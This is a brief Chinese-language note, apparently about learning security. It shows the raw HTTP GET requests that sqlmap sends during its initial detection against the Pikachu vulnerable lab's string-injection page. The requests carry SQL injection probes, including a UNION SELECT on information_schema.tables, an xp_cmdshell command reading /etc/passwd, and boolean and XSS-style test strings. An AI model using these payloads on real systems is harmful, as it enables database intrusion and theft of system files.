Sqlmap在进行初始监测时会进行一些预检测 GET /pikachu/vul/sqli/sqli_str.php?name=root&submit=查询&teEu=1187 AND 1=1 UNION ALL SELECT 1,NULL,‘’,table_name FROM information_schema.tables WHERE 2>1–/**/; EXEC xp_cmdshell(‘cat …/…/…/etc/passwd’)# HTTP/1.1#判断数据库类型和xss语句 GET /pikachu/vul/sqli/sqli_str.php?name=root&submit=查询 HTTP/1.1 GET /pikachu/vul/sqli/sqli_str.php?name=4767&submit=查询 HTTP/1.1 GET /pikachu/vul/sqli/sqli_str.php?name=root(,.,.)."’&submit=查询 HTTP/1.1 GET /pikachu/vul/sqli/sqli_str.php?name=root’fYzJCd<’">QtldwA&submit=查询 HTTP/1.1 GET /pikachu/vul/sqli/sqli_str.php?name=root’) AND 4676=7206 AND (‘OEeA’='OEeA&submit=查询 HTTP/1.1
|